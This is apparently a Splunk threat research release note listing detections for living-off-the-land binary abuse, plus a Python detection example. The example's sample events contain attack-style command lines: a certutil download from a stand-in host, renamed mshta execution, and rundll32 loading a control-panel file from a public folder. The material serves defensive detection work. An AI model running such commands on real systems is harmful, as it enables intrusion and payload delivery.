
Living Off The Land: Threat Research February 2022 Release

In this February 2022 release, the Splunk Threat Research Team (STRT) focused on comparing its existing living off the land security content with Sigma and the LOLBAS project. This gave STRT a way to review current security content and identify gaps. For the LOLBins we did not yet cover, we assessed their in-the-wild usage today and prioritized those over older, more novel LOLBins.

Here is a demo of Living Off The Land content:
 


In February we tagged 73 detections, some of them brand new, and distributed them in a single Analytics Story. We also tagged all prior content with Living Off the Land.

Focusing on Living Off The Land Binaries

Analytic stories are security use cases supported by our threat research team's pre-built detections and responses. The following analytic stories focus on monitoring and investigating activity related to Living Off The Land techniques. Living off the land plays an integral role in an adversary's playbook when landing in an environment: instead of bringing in applications and new utilities, adversaries use utilities native to the operating system. This lets the adversary blend in better with native applications while retaining flexibility in code execution and process behavior.

Detections Used in the Living Off The Land Analytic Stories

Living Off The Land Analytic Story

Name | Technique | Type
--- | --- | ---
BITS Job Persistence | BITS Jobs | TTP
BITSAdmin Download File | BITS Jobs, Ingress Tool Transfer | TTP
CertUtil Download With URLCache and Split Arguments | Ingress Tool Transfer | TTP
CertUtil Download With VerifyCtl and Split Arguments | Ingress Tool Transfer | TTP
Certutil exe certificate extraction | None | TTP
CertUtil With Decode Argument | Deobfuscate/Decode Files or Information | TTP
CMD Carry Out String Command Parameter | Windows Command Shell, Command and Scripting Interpreter | Hunting
Control Loading from World Writable Directory | Signed Binary Proxy Execution, Control Panel | TTP
Creation of Shadow Copy with wmic and powershell | NTDS, OS Credential Dumping | TTP
Detect HTML Help Renamed | Signed Binary Proxy Execution, Compiled HTML File | Hunting
Detect HTML Help Spawn Child Process | Signed Binary Proxy Execution, Compiled HTML File | TTP
Detect HTML Help URL in Command Line | Signed Binary Proxy Execution, Compiled HTML File | TTP
Detect HTML Help Using InfoTech Storage Handlers | Signed Binary Proxy Execution, Compiled HTML File | TTP
Detect mshta inline hta execution | Signed Binary Proxy Execution, Mshta | TTP
Detect mshta renamed | Signed Binary Proxy Execution, Mshta | Hunting
Detect MSHTA Url in Command Line | Signed Binary Proxy Execution, Mshta | TTP
Detect Regasm Spawning a Process | Signed Binary Proxy Execution, Regsvcs/Regasm | TTP
Detect Regasm with Network Connection | Signed Binary Proxy Execution, Regsvcs/Regasm | TTP
Detect Regasm with no Command Line Arguments | Signed Binary Proxy Execution, Regsvcs/Regasm | TTP
Detect Regsvcs Spawning a Process | Signed Binary Proxy Execution, Regsvcs/Regasm | TTP
Detect Regsvcs with Network Connection | Signed Binary Proxy Execution, Regsvcs/Regasm | TTP
Detect Regsvcs with No Command Line Arguments | Signed Binary Proxy Execution, Regsvcs/Regasm | TTP
Detect Regsvr32 Application Control Bypass | Signed Binary Proxy Execution, Regsvr32 | TTP
Detect Rundll32 Application Control Bypass - advpack | Signed Binary Proxy Execution, Rundll32 | TTP
Detect Rundll32 Application Control Bypass - setupapi | Signed Binary Proxy Execution, Rundll32 | TTP
Detect Rundll32 Application Control Bypass - syssetup | Signed Binary Proxy Execution, Rundll32 | TTP
Detect Rundll32 Inline HTA Execution | Signed Binary Proxy Execution, Mshta | TTP
Disable Schedule Task | Disable or Modify Tools, Impair Defenses | TTP
Dump LSASS via comsvcs DLL | LSASS Memory, OS Credential Dumping | TTP
Esentutl SAM Copy | Security Account Manager, OS Credential Dumping | Hunting
Eventvwr UAC Bypass | Bypass User Account Control, Abuse Elevation Control Mechanism | TTP
MacOS LOLbin | Unix Shell, Command and Scripting Interpreter | TTP
Mmc LOLBAS Execution Process Spawn | Remote Services, Distributed Component Object Model | TTP
Mshta spawning Rundll32 OR Regsvr32 Process | Signed Binary Proxy Execution, Mshta | TTP
Ntdsutil Export NTDS | NTDS, OS Credential Dumping | TTP
Reg exe Manipulating Windows Services Registry Keys | Services Registry Permissions Weakness, Hijack Execution Flow | TTP
Regsvr32 Silent and Install Param Dll Loading | Signed Binary Proxy Execution, Regsvr32 | Anomaly
Regsvr32 with Known Silent Switch Cmdline | Signed Binary Proxy Execution, Regsvr32 | Anomaly
Remote WMI Command Attempt | Windows Management Instrumentation | TTP
Rundll32 Control RunDLL Hunt | Signed Binary Proxy Execution, Rundll32 | Hunting
Rundll32 Control RunDLL World Writable Directory | Signed Binary Proxy Execution, Rundll32 | TTP
Rundll32 Create Remote Thread To A Process | Process Injection | TTP
Rundll32 CreateRemoteThread In Browser | Process Injection | TTP
Rundll32 DNSQuery | Signed Binary Proxy Execution, Rundll32 | TTP
Rundll32 Process Creating Exe Dll Files | Signed Binary Proxy Execution, Rundll32 | TTP
Rundll32 Shimcache Flush | Modify Registry | TTP
RunDLL Loading DLL By Ordinal | Signed Binary Proxy Execution, Rundll32 | TTP
Schedule Task with HTTP Command Arguments | Scheduled Task/Job | TTP
Schedule Task with Rundll32 Command Trigger | Scheduled Task/Job | TTP
Scheduled Task Creation on Remote Endpoint using At | Scheduled Task/Job, At (Windows) | TTP
Scheduled Task Deleted Or Created via CMD | Scheduled Task, Scheduled Task/Job | TTP
Scheduled Task Initiation on Remote Endpoint | Scheduled Task/Job, Scheduled Task | TTP
Schtasks scheduling job on remote system | Scheduled Task, Scheduled Task/Job | TTP
Services LOLBAS Execution Process Spawn | Create or Modify System Process, Windows Service | TTP
Suspicious IcedID Rundll32 Cmdline | Signed Binary Proxy Execution, Rundll32 | TTP
Suspicious microsoft workflow compiler rename | Masquerading, Trusted Developer Utilities Proxy Execution, Rename System Utilities | Hunting
Suspicious microsoft workflow compiler usage | Trusted Developer Utilities Proxy Execution | TTP
Suspicious msbuild path | Masquerading, Trusted Developer Utilities Proxy Execution, Rename System Utilities, MSBuild | TTP
Suspicious MSBuild Rename | Masquerading, Trusted Developer Utilities Proxy Execution, Rename System Utilities, MSBuild | TTP
Suspicious MSBuild Spawn | Trusted Developer Utilities Proxy Execution, MSBuild | TTP
Suspicious mshta child process | Signed Binary Proxy Execution, Mshta | TTP
Suspicious mshta spawn | Signed Binary Proxy Execution, Mshta | TTP
Suspicious Regsvr32 Register Suspicious Path | Signed Binary Proxy Execution, Regsvr32 | TTP
Suspicious Rundll32 dllregisterserver | Signed Binary Proxy Execution, Rundll32 | TTP
Suspicious Scheduled Task from Public Directory | Scheduled Task, Scheduled Task/Job | Anomaly
Svchost LOLBAS Execution Process Spawn | Scheduled Task/Job, Scheduled Task | TTP
Windows Diskshadow Proxy Execution | Signed Binary Proxy Execution | TTP
Windows InstallUtil in Non Standard Path | Masquerading, Rename System Utilities, Signed Binary Proxy Execution, InstallUtil | TTP
Windows InstallUtil Remote Network Connection | InstallUtil, Signed Binary Proxy Execution | TTP
Windows InstallUtil Uninstall Option | InstallUtil, Signed Binary Proxy Execution | TTP
Windows InstallUtil Uninstall Option with Network | InstallUtil, Signed Binary Proxy Execution | TTP
Windows InstallUtil URL in Command Line | InstallUtil, Signed Binary Proxy Execution | TTP
WSReset UAC Bypass | Bypass User Account Control, Abuse Elevation Control Mechanism | TTP
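To make the logic behind three of the detection names in the table concrete, here is an added example, written for this page rather than taken from Splunk's SPL or any Splunk code, that applies the same checks in Python to constructed Sysmon-style process-creation events. The world-writable directory list, the field names and the sample events are assumptions made for the example.

```python
import ntpath

# Directories any local user can write to; an assumption for this example, not a Splunk lookup.
WORLD_WRITABLE = ("c:\\windows\\temp\\", "c:\\users\\public\\", "c:\\programdata\\")


def _tokens(cmdline):
    """Lower-case command-line tokens with quotes and '-'/'/' flag prefixes stripped."""
    return [t.strip('"').lstrip("-/") for t in cmdline.lower().split()]


def certutil_urlcache_split(ev):
    """Both flags present, in any order, with either '-' or '/' prefix."""
    toks = _tokens(ev["CommandLine"])
    return (ev["OriginalFileName"].lower() == "certutil.exe"
            and "urlcache" in toks and "split" in toks)


def mshta_renamed(ev):
    """PE version info still says mshta.exe, but the on-disk file name does not."""
    image = ntpath.basename(ev["Image"]).lower()
    return ev["OriginalFileName"].lower() == "mshta.exe" and image != "mshta.exe"


def rundll32_control_world_writable(ev):
    """Control_RunDLL entry point loading a module from a user-writable path."""
    if ntpath.basename(ev["Image"]).lower() != "rundll32.exe":
        return False
    toks = _tokens(ev["CommandLine"])
    return (any(t.endswith("control_rundll") for t in toks)
            and any(t.startswith(WORLD_WRITABLE) for t in toks))


# Detection names as listed in the table, mapped to the check that stands in for them here.
CHECKS = {
    "CertUtil Download With URLCache and Split Arguments": certutil_urlcache_split,
    "Detect mshta renamed": mshta_renamed,
    "Rundll32 Control RunDLL World Writable Directory": rundll32_control_world_writable,
}


def evaluate(ev):
    """Return the names of every check that fires on one process-creation event."""
    return [name for name, check in CHECKS.items() if check(ev)]


# Constructed sample telemetry (Sysmon Event ID 1 field names); the last event is benign.
EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -split -urlcache -f http://example.invalid/a.txt a.txt"},
    {"Image": r"C:\Users\Public\update.exe", "OriginalFileName": "MSHTA.EXE",
     "CommandLine": r"C:\Users\Public\update.exe C:\Users\Public\page.hta"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "OriginalFileName": "RUNDLL32.EXE",
     "CommandLine": r"rundll32.exe shell32.dll,Control_RunDLL C:\Users\Public\x.cpl"},
    {"Image": r"C:\Windows\System32\certutil.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "certutil.exe -verify cert.cer"},
]
```

Running `evaluate` over `EVENTS` flags the first three events, one detection name each, and leaves the plain certificate verification unflagged; comparing `OriginalFileName` to the image name is what lets the rename check survive the binary being copied under another name.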

 

Automating with SOAR Playbooks

All of the previously listed detections create entries in the risk index by default and can be used seamlessly with risk notables and the Risk Notable Playbook Pack. The following community Splunk SOAR playbooks can also be used in conjunction with some of the previously described analytics:

 

Playbook | Description
--- | ---
Internal Host SSH Investigate | Investigate an internal *nix host using SSH. This pushes a bash script to the endpoint and runs it, collecting generic information about the processes, user activity, and network activity. This includes the process list, login history, cron jobs, and open sockets. The results are zipped up in .csv files and added to the vault for an analyst to review.
Internal Host WinRM Investigate | Performs a general investigation on key aspects of a Windows device using Windows Remote Management. Important files related to the endpoint are generated, bundled into a zip, and copied to the container vault.
Delete Detected Files | This playbook acts upon events where a file has been determined to be malicious (i.e., webshells being dropped on an end host). Before deleting the file, we run a "more" command on the file in question to extract its contents. We then run a delete on the file in question.


Why Should You Care?

Living Off The Land binaries are nothing new, yet they continue to be abused because they provide an expedient means of executing actions against compromised hosts without triggering protections: LOLBins are native to the operating system or are downloaded from Microsoft.

Many of these actions, such as compiling or executing code, pass-through execution, UAC bypass, and file operations such as download, copy or upload, give an attacker native tools for operating on compromised hosts. It is important for analysts to have tools that provide the visibility and monitoring capabilities needed to address threats arising from the abuse of living off the land binaries.

For a full list of security content, check out the release notes on Splunk Docs.

Learn more

You can find the latest content about security analytic stories on GitHub and in Splunkbase. Splunk Security Essentials also has all these detections now available via push update. 

Feedback

Any feedback or requests? Feel free to open an issue on GitHub, and we'll follow up. Alternatively, join us on the Slack channel #security-research. Follow these instructions if you need an invitation to our Splunk user groups on Slack.


Contributors

We would like to thank the whole threat research team, Jose Hernandez, Teoderick Contreras, Rod Soto, Bhavin Patel, Mauricio Velazco, Michael Haag, Lou Stella, Eric McGinnis, and Patrick Bareiss, for their contributions to this release.

 

The Splunk Threat Research Team is an active part of a customer's overall defense strategy, enhancing Splunk security offerings with verified research and security content such as use cases, detection searches, and playbooks. We help security teams around the globe strengthen operations by providing tactical guidance and insights to detect, investigate and respond to the latest threats. The Splunk Threat Research Team focuses on understanding how threats, actors, and vulnerabilities work, and the team replicates attacks, which are stored as datasets in the Attack Data repository.

Our goal is to provide security teams with research they can leverage in their day-to-day operations and to become the industry standard for SIEM detections. We are a team of industry-recognized experts who are encouraged to improve the security industry by sharing our work with the community via conference talks, open-sourcing projects, and writing white papers or blogs. You will also find us presenting our research at conferences such as Defcon, Blackhat, RSA, and many more.


